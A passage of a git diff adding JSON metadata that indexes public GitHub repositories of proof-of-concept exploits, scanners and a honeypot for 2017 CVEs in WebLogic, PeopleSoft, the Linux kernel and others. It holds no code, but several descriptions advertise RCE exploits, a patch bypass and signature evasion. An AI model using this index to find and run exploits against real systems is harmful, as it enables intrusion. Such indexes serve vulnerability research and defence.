"visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 117926261, + "name": "cve-2017-10271-poc", + "full_name": "SuperHacker-liuan\/cve-2017-10271-poc", + "owner": { + "login": "SuperHacker-liuan", + "id": 30787037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30787037?v=4", + "html_url": "https:\/\/github.com\/SuperHacker-liuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SuperHacker-liuan\/cve-2017-10271-poc", + "description": "cve-2017-10271 POC", + "fork": false, + "created_at": "2018-01-18T03:21:15Z", + "updated_at": "2022-11-14T08:17:26Z", + "pushed_at": "2018-02-02T07:47:30Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 118144871, + "name": "Oracle-WebLogic-CVE-2017-10271", + "full_name": "peterpeter228\/Oracle-WebLogic-CVE-2017-10271", + "owner": { + "login": "peterpeter228", + "id": 22089258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22089258?v=4", + "html_url": "https:\/\/github.com\/peterpeter228", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peterpeter228\/Oracle-WebLogic-CVE-2017-10271", + "description": "WebLogic wls-wsat RCE CVE-2017-10271", + "fork": false, + "created_at": "2018-01-19T15:50:08Z", + "updated_at": "2023-11-18T03:10:27Z", + "pushed_at": "2018-01-19T11:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 120571410, + "name": "weblogic_honeypot", + "full_name": "Cymmetria\/weblogic_honeypot", + "owner": { + "login": "Cymmetria", + "id": 19413345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19413345?v=4", + "html_url": "https:\/\/github.com\/Cymmetria", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cymmetria\/weblogic_honeypot", + "description": "WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.", + "fork": false, + "created_at": "2018-02-07T06:11:23Z", + "updated_at": "2024-09-21T11:34:13Z", + "pushed_at": "2020-04-25T20:55:29Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "deception", + "execution-vulnerability", + "honeypot", + "oracle", + "security", + "security-tools", + "security-vulnerability", + "vulnerability", + "weblogic", + "weblogic-server" + ], + "visibility": "public", + "forks": 12, + "watchers": 32, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 123384221, + "name": "weblogic_wls_rce_poc-exp", + "full_name": "JackyTsuuuy\/weblogic_wls_rce_poc-exp", + "owner": { + "login": "JackyTsuuuy", + "id": 9449527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9449527?v=4", + "html_url": "https:\/\/github.com\/JackyTsuuuy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JackyTsuuuy\/weblogic_wls_rce_poc-exp", + "description": "cve-2017-10271", + "fork": false, + "created_at": "2018-03-01T04:57:09Z", + "updated_at": "2020-07-31T16:12:20Z", + "pushed_at": "2018-03-01T05:08:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 139956588, + "name": "Oracle-WebLogic-CVE-2017-10271-master", + "full_name": "lonehand\/Oracle-WebLogic-CVE-2017-10271-master", + "owner": { + "login": "lonehand", + "id": 20275278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20275278?v=4", + "html_url": "https:\/\/github.com\/lonehand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lonehand\/Oracle-WebLogic-CVE-2017-10271-master", + "description": null, + "fork": false, + "created_at": "2018-07-06T08:32:28Z", + "updated_at": "2019-06-27T03:08:05Z", + "pushed_at": "2018-07-06T08:42:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 148616806, + "name": "javaserializetools", + "full_name": "shack2\/javaserializetools", + "owner": { + "login": "shack2", + "id": 26374431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26374431?v=4", + "html_url": "https:\/\/github.com\/shack2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shack2\/javaserializetools", + "description": "Java反序列化漏洞利用工具V1.0 Java反序列化相关漏洞的检查工具,采用JDK 1.8+NetBeans8.2开发,软件运行必须安装JDK 1.8或者以上版本。 支持:weblogic xml反序列化漏洞 CVE-2017-10271\/CNVD-C-2019-48814\/CVE-2019-2725检查。", + "fork": false, + "created_at": "2018-09-13T09:44:18Z", + "updated_at": "2024-11-21T04:50:58Z", + "pushed_at": "2020-10-01T20:20:41Z", + "stargazers_count": 458, + "watchers_count": 458, + "has_discussions": false, + "forks_count": 115, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 115, + "watchers": 458, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 161570094, + "name": "JavaDeserialization", + "full_name": "ETOCheney\/JavaDeserialization", + "owner": { + "login": "ETOCheney", + "id": 28469578, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28469578?v=4", + "html_url": "https:\/\/github.com\/ETOCheney", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ETOCheney\/JavaDeserialization", + "description": "针对类似CVE-2017-10271漏洞的一个java反序列化漏洞扫描器", + "fork": false, + "created_at": "2018-12-13T02:00:23Z", + "updated_at": "2023-11-21T01:26:28Z", + "pushed_at": "2018-12-13T14:05:28Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 162520695, + "name": "CVE-2017-10271", + "full_name": "r4b3rt\/CVE-2017-10271", + "owner": { + "login": "r4b3rt", + "id": 38994730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38994730?v=4", + "html_url": "https:\/\/github.com\/r4b3rt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4b3rt\/CVE-2017-10271", + "description": "Weblogic(CVE-2017-10271)", + "fork": false, + "created_at": "2018-12-20T03:17:51Z", + "updated_at": "2018-12-20T03:17:53Z", + "pushed_at": "2018-12-04T14:45:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 165317811, + "name": "cve-2017-10271", + "full_name": "cved-sources\/cve-2017-10271", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-10271", + "description": "cve-2017-10271", + "fork": false, + "created_at": "2019-01-11T22:11:16Z", + "updated_at": "2021-04-15T21:23:38Z", + "pushed_at": "2021-04-15T21:23:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 175729381, + "name": "Oracle-WebLogic-CVE-2017-10271", + "full_name": "XHSecurity\/Oracle-WebLogic-CVE-2017-10271", + "owner": { + "login": "XHSecurity", + "id": 48574583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48574583?v=4", + "html_url": "https:\/\/github.com\/XHSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XHSecurity\/Oracle-WebLogic-CVE-2017-10271", + "description": "原创作者:Bearcat@secfree.com", + "fork": false, + "created_at": "2019-03-15T01:50:01Z", + "updated_at": "2024-08-25T01:26:04Z", + "pushed_at": "2024-08-25T01:17:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 176763123, + "name": "Weblogic_Wsat_RCE", + "full_name": "kbsec\/Weblogic_Wsat_RCE", + "owner": { + "login": "kbsec", + "id": 11823496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11823496?v=4", + "html_url": "https:\/\/github.com\/kbsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kbsec\/Weblogic_Wsat_RCE", + "description": "POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code. ", + "fork": false, + "created_at": "2019-03-20T15:26:55Z", + "updated_at": "2021-08-30T23:51:56Z", + "pushed_at": "2019-03-27T17:47:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 183346706, + "name": "CNVD-C-2019-48814-CNNVD-201904-961", + "full_name": "SkyBlueEternal\/CNVD-C-2019-48814-CNNVD-201904-961", + "owner": { + "login": "SkyBlueEternal", + "id": 46418185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46418185?v=4", + "html_url": "https:\/\/github.com\/SkyBlueEternal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SkyBlueEternal\/CNVD-C-2019-48814-CNNVD-201904-961", + "description": "CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC", + "fork": false, + "created_at": "2019-04-25T03:07:53Z", + "updated_at": "2024-08-12T19:48:15Z", + "pushed_at": "2019-04-29T02:06:00Z", + "stargazers_count": 105, + "watchers_count": 105, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 105, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 183428186, + "name": "WebLogic_CNVD_C_2019_48814", + "full_name": "Yuusuke4\/WebLogic_CNVD_C_2019_48814", + "owner": { + "login": "Yuusuke4", + "id": 26989867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26989867?v=4", + "html_url": "https:\/\/github.com\/Yuusuke4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuusuke4\/WebLogic_CNVD_C_2019_48814", + "description": "WebLogic CNVD-C-2019_48814 CVE-2017-10271", + "fork": false, + "created_at": "2019-04-25T12:18:16Z", + "updated_at": "2019-04-25T12:33:00Z", + "pushed_at": "2019-04-25T12:10:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183430704, + "name": "WebLogic_CNVD_C2019_48814", + "full_name": "7kbstorm\/WebLogic_CNVD_C2019_48814", + "owner": { + "login": "7kbstorm", + "id": 38887063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38887063?v=4", + "html_url": "https:\/\/github.com\/7kbstorm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7kbstorm\/WebLogic_CNVD_C2019_48814", + "description": "WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm", + "fork": false, + "created_at": "2019-04-25T12:33:31Z", + "updated_at": "2024-11-01T02:37:48Z", + "pushed_at": "2019-04-25T12:44:02Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 116, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 219752851, + "name": "-CVE-2017-10271-", + "full_name": "ianxtianxt\/-CVE-2017-10271-", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/-CVE-2017-10271-", + "description": " (CVE-2017-10271)Java反序列化漏洞", + "fork": false, + "created_at": "2019-11-05T13:33:56Z", + "updated_at": "2024-08-12T19:54:34Z", + "pushed_at": "2019-11-05T13:35:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 253372582, + "name": "CVE-2017-10271", + "full_name": "testwc\/CVE-2017-10271", + "owner": { + "login": "testwc", + "id": 7675910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7675910?v=4", + "html_url": "https:\/\/github.com\/testwc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/testwc\/CVE-2017-10271", + "description": "CVE-2017-10271", + "fork": false, + "created_at": "2020-04-06T02:01:20Z", + "updated_at": "2020-05-08T06:52:50Z", + "pushed_at": "2020-05-08T06:52:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 313801625, + "name": "CVE-2017-10271", + "full_name": "Al1ex\/CVE-2017-10271", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2017-10271", + "description": "CVE-2017-10271", + "fork": false, + "created_at": "2020-11-18T02:31:18Z", + "updated_at": "2024-08-12T20:07:44Z", + "pushed_at": "2020-11-18T02:31:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-10271", + "rce", + "weblogic" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 372542306, + "name": "weblogic-CVE-2019-2729-POC", + "full_name": "pizza-power\/weblogic-CVE-2019-2729-POC", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/weblogic-CVE-2019-2729-POC", + "description": "python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others", + "fork": false, + "created_at": "2021-05-31T14:54:38Z", + "updated_at": "2022-08-27T19:09:37Z", + "pushed_at": "2021-05-31T14:55:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503359850, + "name": "7kbstormq", + "full_name": "KKsdall\/7kbstormq", + "owner": { + "login": "KKsdall", + "id": 107482959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107482959?v=4", + "html_url": "https:\/\/github.com\/KKsdall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KKsdall\/7kbstormq", + "description": "WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm", + "fork": false, + "created_at": "2022-06-14T12:55:53Z", + "updated_at": "2022-06-14T12:55:53Z", + "pushed_at": "2022-06-14T12:55:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10352.json b/2017/CVE-2017-10352.json new file mode 100644 index 0000000000..2e77f55dc8 --- /dev/null +++ b/2017/CVE-2017-10352.json @@ -0,0 +1,33 @@ +[ + { + "id": 121908591, + "name": "weblogic-XMLDecoder", + "full_name": "bigsizeme\/weblogic-XMLDecoder", + "owner": { + "login": "bigsizeme", + "id": 17845094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17845094?v=4", + "html_url": "https:\/\/github.com\/bigsizeme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigsizeme\/weblogic-XMLDecoder", + "description": "CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder", + "fork": false, + "created_at": "2018-02-18T01:40:33Z", + "updated_at": "2024-01-12T11:24:41Z", + "pushed_at": "2018-02-25T02:01:19Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10366.json b/2017/CVE-2017-10366.json new file mode 100644 index 0000000000..acc3370ac9 --- /dev/null +++ b/2017/CVE-2017-10366.json @@ -0,0 +1,33 @@ +[ + { + "id": 147225109, + "name": "CVE-2017-10366_peoplesoft", + "full_name": "blazeinfosec\/CVE-2017-10366_peoplesoft", + "owner": { + "login": "blazeinfosec", + "id": 16681975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16681975?v=4", + "html_url": "https:\/\/github.com\/blazeinfosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blazeinfosec\/CVE-2017-10366_peoplesoft", + "description": "CVE-2017-10366: Oracle PeopleSoft 8.54, 8.55, 8.56 Java deserialization exploit", + "fork": false, + "created_at": "2018-09-03T15:46:39Z", + "updated_at": "2024-08-12T19:41:21Z", + "pushed_at": "2018-09-04T10:07:06Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10617.json b/2017/CVE-2017-10617.json new file mode 100644 index 0000000000..0e3c0afea3 --- /dev/null +++ b/2017/CVE-2017-10617.json @@ -0,0 +1,33 @@ +[ + { + "id": 106521526, + "name": "CVE-2017-10617", + "full_name": "gteissier\/CVE-2017-10617", + "owner": { + "login": "gteissier", + "id": 201614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/201614?v=4", + "html_url": "https:\/\/github.com\/gteissier", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gteissier\/CVE-2017-10617", + "description": "Contrail: hard coded credentials (CVE-2017-10616) and XML External Entity (XXE) vulnerability (CVE-2017-10617)", + "fork": false, + "created_at": "2017-10-11T07:38:18Z", + "updated_at": "2024-08-24T02:02:45Z", + "pushed_at": "2019-02-22T06:03:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10661.json b/2017/CVE-2017-10661.json new file mode 100644 index 0000000000..bfe8d5ef57 --- /dev/null +++ b/2017/CVE-2017-10661.json @@ -0,0 +1,33 @@ +[ + { + "id": 100021936, + "name": "CVE-2017-10661_POC", + "full_name": "GeneBlue\/CVE-2017-10661_POC", + "owner": { + "login": "GeneBlue", + "id": 10919709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10919709?v=4", + "html_url": "https:\/\/github.com\/GeneBlue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeneBlue\/CVE-2017-10661_POC", + "description": "poc for cve-2017-10661", + "fork": false, + "created_at": "2017-08-11T10:45:10Z", + "updated_at": "2024-05-13T15:52:30Z", + "pushed_at": "2017-08-11T10:45:56Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10797.json b/2017/CVE-2017-10797.json new file mode 100644 index 0000000000..a1eb8136bf --- /dev/null +++ b/2017/CVE-2017-10797.json @@ -0,0 +1,33 @@ +[ + { + "id": 119376202, + "name": "CVE-2017-10797", + "full_name": "n4xh4ck5\/CVE-2017-10797", + "owner": { + "login": "n4xh4ck5", + "id": 26029224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26029224?v=4", + "html_url": "https:\/\/github.com\/n4xh4ck5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n4xh4ck5\/CVE-2017-10797", + "description": "CVE-2017-10797- User Enumeration in OwnCloud Server 8.1-10.0", + "fork": false, + "created_at": "2018-01-29T11:53:14Z", + "updated_at": "2024-08-12T19:35:51Z", + "pushed_at": "2018-01-29T11:56:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10952.json b/2017/CVE-2017-10952.json new file mode 100644 index 0000000000..271400dc8b --- /dev/null +++ b/2017/CVE-2017-10952.json @@ -0,0 +1,33 @@ +[ + { + "id": 223679465, + "name": "CVE-2017-10952", + "full_name": "afbase\/CVE-2017-10952", + "owner": { + "login": "afbase", + "id": 1551660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1551660?v=4", + "html_url": "https:\/\/github.com\/afbase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afbase\/CVE-2017-10952", + "description": null, + "fork": false, + "created_at": "2019-11-24T02:01:24Z", + "updated_at": "2024-08-12T19:55:08Z", + "pushed_at": "2019-12-01T03:47:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11176.json b/2017/CVE-2017-11176.json new file mode 100644 index 0000000000..aab537cd6a --- /dev/null +++ b/2017/CVE-2017-11176.json @@ -0,0 +1,223 @@ +[ + { + "id": 151221014, + "name": "cve-2017-11176", + "full_name": "lexfo\/cve-2017-11176", + "owner": { + "login": "lexfo", + "id": 23701097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23701097?v=4", + "html_url": "https:\/\/github.com\/lexfo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lexfo\/cve-2017-11176", + "description": null, + "fork": false, + "created_at": "2018-10-02T08:06:04Z", + "updated_at": "2024-08-12T19:42:08Z", + "pushed_at": "2018-10-02T10:27:06Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 27, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 157327850, + "name": "cve-2017-11176", + "full_name": "DoubleMice\/cve-2017-11176", + "owner": { + "login": "DoubleMice", + "id": 22325256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22325256?v=4", + "html_url": "https:\/\/github.com\/DoubleMice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DoubleMice\/cve-2017-11176", + "description": "My first try to code my own LPE exploit.", + "fork": false, + "created_at": "2018-11-13T05:55:03Z", + "updated_at": "2018-11-22T03:50:39Z", + "pushed_at": "2018-11-22T03:50:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 201151172, + "name": "CVE-2017-11176", + "full_name": "HckEX\/CVE-2017-11176", + "owner": { + "login": "HckEX", + "id": 33862757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33862757?v=4", + "html_url": "https:\/\/github.com\/HckEX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HckEX\/CVE-2017-11176", + "description": null, + "fork": false, + "created_at": "2019-08-08T01:02:52Z", + "updated_at": "2019-08-08T01:03:36Z", + "pushed_at": "2019-08-08T01:03:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 216932661, + "name": "cve-2017-11176", + "full_name": "leonardo1101\/cve-2017-11176", + "owner": { + "login": "leonardo1101", + "id": 18727079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18727079?v=4", + "html_url": "https:\/\/github.com\/leonardo1101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leonardo1101\/cve-2017-11176", + "description": null, + "fork": false, + "created_at": "2019-10-23T00:16:03Z", + "updated_at": "2019-12-23T17:30:49Z", + "pushed_at": "2019-12-23T17:25:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 254632182, + "name": "CVE-2017-11176", + "full_name": "c3r34lk1ll3r\/CVE-2017-11176", + "owner": { + "login": "c3r34lk1ll3r", + "id": 12492834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12492834?v=4", + "html_url": "https:\/\/github.com\/c3r34lk1ll3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3r34lk1ll3r\/CVE-2017-11176", + "description": "Code execution for CVE-2017-11176", + "fork": false, + "created_at": "2020-04-10T12:44:05Z", + "updated_at": "2022-11-09T18:07:10Z", + "pushed_at": "2020-04-10T13:11:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-11176", + "exploitation", + "kernel-exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 510865273, + "name": "CVE-2017-11176", + "full_name": "Sama-Ayman-Mokhtar\/CVE-2017-11176", + "owner": { + "login": "Sama-Ayman-Mokhtar", + "id": 54854067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54854067?v=4", + "html_url": "https:\/\/github.com\/Sama-Ayman-Mokhtar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sama-Ayman-Mokhtar\/CVE-2017-11176", + "description": "mq_notify: double sock_put()", + "fork": false, + "created_at": "2022-07-05T19:13:29Z", + "updated_at": "2022-11-29T20:52:22Z", + "pushed_at": "2022-07-16T22:48:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754620368, + "name": "CVE-2017-11176", + "full_name": "Yanoro\/CVE-2017-11176", + "owner": { + "login": "Yanoro", + "id": 50038395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50038395?v=4", + "html_url": "https:\/\/github.com\/Yanoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yanoro\/CVE-2017-11176", + "description": null, + "fork": false, + "created_at": "2024-02-08T12:49:53Z", + "updated_at": "2024-11-23T22:58:33Z", + "pushed_at": 